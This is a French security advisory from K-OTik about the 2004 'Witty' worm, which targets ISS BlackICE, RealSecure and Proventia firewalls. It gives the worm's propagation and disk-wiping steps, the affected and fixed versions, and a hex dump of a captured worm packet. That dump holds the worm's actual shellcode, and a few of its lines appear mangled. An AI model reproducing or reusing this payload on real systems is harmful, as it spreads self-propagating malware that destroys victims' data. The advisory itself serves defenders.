Alerte : Un ver destructeur exploite les dernières failles des firewalls ISS

 

F-VNS SECURITY v2.0 - Le service de veille personnalisée, destiné aux responsables sécurité des systèmes d'information (RSSI) et directeurs informatiques » Offre d'essai de 15 jours


Par K-OTik.COM © (Cellule Veille) - Un nouveau ver destructeur exploitant les dernières vulnérabilités présentes dans plusieurs produits ISS à commencé sa propagation ce samedi 20 Mars 2004, il est identifiée sous le nom "Witty".

La partie PayLoad de
"Witty" est contenue dans un paquet UDP unique de 1025 octets, seuls les 470 premiers octets contiennent le code de fonctionnement du ver, le reste du code est utilisé pour l'exploitation du débordement mémoire (la taille du ver est directement liée aux adresses source/destination).

 


Si le paquet est contrôlé par une version vulnérable de BlackICE l'exploit sera exécutée (la vulnérabilité de RealSecure et Proventia n'a pas encore été confirmée).

Ce ver utilise le port 4000 comme source et un port aléatoire comme destination (l'utilisation d'autres ports est possible), il ne crée aucun fichier sur la machine infectée, il est uniquement présent en mémoire. Les machines infectées envoient un grand nombre de paquets UDP, ce qui provoque la saturation réseau. "Witty" est extrêmement malveillant car il détruit les fichiers présents sur les disques.

Le ver fonctionne de la manière suivante :

    1) Génère une adresse IP aléatoire
    2) Envoie la charge explosive
    3) Répète les étapes 1 et 2 (20000 fois)
    4) Accède au disque dur
    5) Cherche un point aléatoire sur le disque
    6) Ecrit 65k de données sur le disque (à un point aléatoire)
    7) Ferme le disque
    8) Recommence le processus à partir de l'étape 1

L'écriture sur le disque provoquera la destruction de certains fichiers système, l'endommagement des fichiers dépendra de la période d'activité du ver au sein du système.

Solution :

 --> Afin d'éviter l'infection, il est impératif d'installer les MAJ.
 --> Si une machine est infectée, la destruction du ver se fera après un simple reboot
   (ce ver
ne crée aucun fichier sur la machine, il est uniquement présent en mémoire).

 Source : © K-OTik.COM / SANS / LURHQ / SYMANTEC / F-SECURE   

Versions Vulnérables :

BlackICE Agent for Server 3.6 ecf et inférieures
BlackICE PC Protection 3.6 ccf et inférieures
BlackICE Server Protection 3.6 ccf et inférieures
RealSecure Desktop 7.0 ebl et inférieures
RealSecure Desktop 3.6 ecf et inférieures
RealSecure Guard 3.6 ecf et inférieures
RealSecure Sentry 3.6 ecf et inférieures
RealSecure Network 7.0, XPU 22.11 et inférieures
RealSecure Server Sensor 7.0 XPU 22.11 et inférieures
RealSecure Server Sensor 6.5 for Windows SR 3.10 et inférieures
Proventia A Series XPU 22.11 et inférieures
Proventia G Series XPU 22.11 et inférieures
Proventia M Series XPU 1.9 et inférieures

Solution :

Utiliser les versions suivantes :

BlackICE Agent for Server 3.6 ecg
BlackICE PC Protection 3.6 ccg
BlackICE Server Protection 3.6 ccg
RealSecure Network 7.0, XPU 22.12
RealSecure Server Sensor 7.0 XPU 22.12
Proventia A Series XPU 22.12
Proventia G Series XPU 22.12
Proventia M Series XPU 1.10
RealSecure Desktop 7.0 ebm
RealSecure Desktop 3.6 ecg
RealSecure Guard 3.6 ecg
RealSecure Sentry 3.6 ecg
RealSecure Server Sensor 6.5 for Windows SR 3.11

http://www.iss.net/download/

-------------------------------------------------------------- Wetty -----------------------------------------------------------------------
01:54:45.699383 219.154.156.161.4000 > 65.173.218.164.50212:  udp 997
0x0000   4500 0401 d3b4 0000 7111 dda9 db9a 9ca1        E.......q.......
0x0010   41ad daa4 0fa0 c424 03ed dd38 0500 0000        A......$...8....
0x0020   0000 0012 0200 0000 0000 0000 0000 0000        ................
0x0030   0002 2c00 0500 0000 0000 006e 0000 0000        ..,........n....
0x0040   0000 0000 0000 0000 0000 0000 0001 0000        ................
0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0060   4102 0500 0000 0000 00de 0300 0000 0000        A...............
0x0070   0000 0000 0000 0000 0000 0100 0001 0000        ................
0x0080   0100 001e 0220 2020 2020 2020 285e 2e5e        ............(^.^
0x0090   2920 2020 2020 2069 6e73 6572 7420 7769        )......insert.wi
0x00a0   7474 7920 6d65 7373 6167 6520 6865 7265        tty.message.here
0x00b0   2e20 2020 2020 2028 5e2e 5e29 2020 2020        .......(^.^)....
0x00c0   2020 2089 e78b 7f14 83c7 0881 c4e8 fdff        ................
0x00d0   ff31 c966 b933 3251 6877 7332 5f54 3eff        .1.f.32Qhws2_T>.
0x00e0   159c 400d 5e89 c331 c966 b965 7451 6873        ..@.^..1.f.etQhs
0x00f0   6f63 6b54 533e ff15 9840 0d5e 6a11 6a02        ockTS>...@.^j.j.
0x0100   6a02 ffd0 89c6 31c9 5168 6269 6e64 5453        j.....1.QhbindTS
0x0110   3eff 1598 400d 5e31 c951 5151 81e9 feff        >...@.^1.QQQ....
0x0120   f05f 5189 e16a 1051 56ff d031 c966 b974        ._Q..j.QV..1.f.t
0x0130   6f51 6873 656e 6454 533e ff15 9840 0d5e        oQhsendTS>...@.^
0x0140   89c3 83c4 3c31 c951 6865 6c33 3268 6b65        .... 0x0150   726e 543e ff15 9c40 0d5e 31c9 5168 6f75        rnT>...@.^1.Qhou
0x0160   6e74 6869 636b 4368 4765 7454 5450 3eff        nthickChGetTTP>.
0x0170   1598 400d 5eff d089 c583 c41c 31c9 81e9        ..@.^.......1...
0x0180   e0b1 ffff 5131 c02d 03bc fcff f7e5 2d3d        ....Q1.-......-=
0x0190   61d9 ff89 c131 c02d 03bc fcff f7e1 2d3d        a....1.-......-=
0x01a0   61d9 ff89 c531 d252 52c1 e910 6689 c850        a....1.RR...f..P
0x01b0   31c0 2d03 bcfc fff7 e52d 3d61 d9ff 89c5        1.-......-=a....
0x01c0   30e4 b002 5089 e06a 1050 31c0 502d 03bc        0...P..j.P1.P-..
0x01d0   fcff f7e5 2d3d 61d9 ff89 c5c1 e817 80c4        ....-=a.........
0x01e0   0350 5756 ffd3 83c4 1059 e298 31c0 2d03        .PWV.....Y..1.-.
0x01f0   bcfc fff7 e52d 3d61 d9ff 89c5 c1e8 1080        .....-=a........
0x0200   e407 80cc 30b0 4550 6844 5249 5668 4943        ....0.EPhDRIVhIC
0x0210   414c 6850 4859 5368 5c5c 2e5c 89e0 31c9        ALhPHYSh\\.\..1.
0x0220   51b2 20c1 e218 526a 0351 6a03 d1e2 5250        Q.....Rj.Qj...RP
0x0230   3eff 15dc 400d 5e83 c414 31c9 81e9 e0b1        >...@.^...1.....
0x0240   ffff 3dff ffff ff0f 8437 ffff ff56 89c6        ..=......7...V..
0x0250   31c0 5050 2d03 bcfc fff7 e52d 3d61 d9ff        1.PP-......-=a..
0x0260   89c5 d1e8 6689 c850 563e ff15 c440 0d5e        ....f..PV>...@.^
0x0270   31c9 5189 e251 52b5 80d1 e151 b15e c1e1        1.Q..QR....Q.^..
0x0280   1851 563e ff15 9440 0d5e 563e ff15 3840        .QV>...@.^V>..8@
0x0290   0d5e 5e5e e9ac feff ff63 7607 5ee9 21fe        .^^^.....cv.^.!.
0x02a0   ffff 0043 666a 7663 6c62 3431 5051 3530        ...Cfjvclb41PQ50
0x02b0   6a48 3150 6334 5051 5559 4878 3774 654f        jH1Pc4PQUYHx7teO
0x02c0   7a54 5354 5954 654c 4d41 0d0a 446c 4433        zTSTYTeLMA..DlD3
0x02d0   5237 6c56 7442 4375 6b6b 6864 7a2b 3276        R7lVtBCukkhdz+2v
0x02e0   6f75 3033 4163 3557 4f52 6b75 7172 6764        ou03Ac5WORkuqrgd
0x02f0   4b72 7531 5a49 4f43 6c53 522f 7851 4f69        Kru1ZIOClSR/xQOi
0x0300   4b6f 3648 7a4a 7567 5272 4934 7337 4f6b        Ko6HzJugRrI4s7Ok
0x0310   534b 7750 714c 7534 0d0a 3562 614e 6252        SKwPqLu4..5baNbR
0x0320   3067 504e 5950 4000 3406 b662 4044 5219        [email protected]@DR.
0x0330   928e 0442 6741 6241 4630 4544 4141 5741        ...BgAbAF0EDAAWA
0x0340   4141 4141 4141 4141 4131 3833 223e 0a20        AAAAAAAAA183">..
0x0350   2020 2020 8001 0000 4600 0000 4600 0000        ........F...F...
0x0360   8000 0000 0200 0000 66cc 5b40 ef1c 0d00        ........f.[@....
0x0370   83e1 00b0 1100 0600 d003 0000 d003 0000        ................
0x0380   0004 0000 0200 0000 aacc 5b40 0e27 0700        ..........[@.'..
0x0390   83e1 0000 0000 0002 00b0 d02b a49b 0800        ...........+....
0x03a0   4500 03c2 0a72 0000 8011 0000 83e1 1bb1        E....r..........
0x03b0   ba54 02a2 0fa0 06a5 03ae eb72 0500 0000        .T.........r....
0x03c0   0000 0012 0200 0000 0000 0000 0000 0000        ................
0x03d0   0002 2c00 0500 0000 0000 006e 0000 0000        ..,........n....
0x03e0   0000 0000 0000 0032 5e80 1d33 1d20 0c95        .......2^..3....
0x03f0   8310 167b 1100 0700 4600 0000 4600 0000        ...{....F...F...
------------------------------------------------------------------------------------------------------------------------------------------------

      

 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits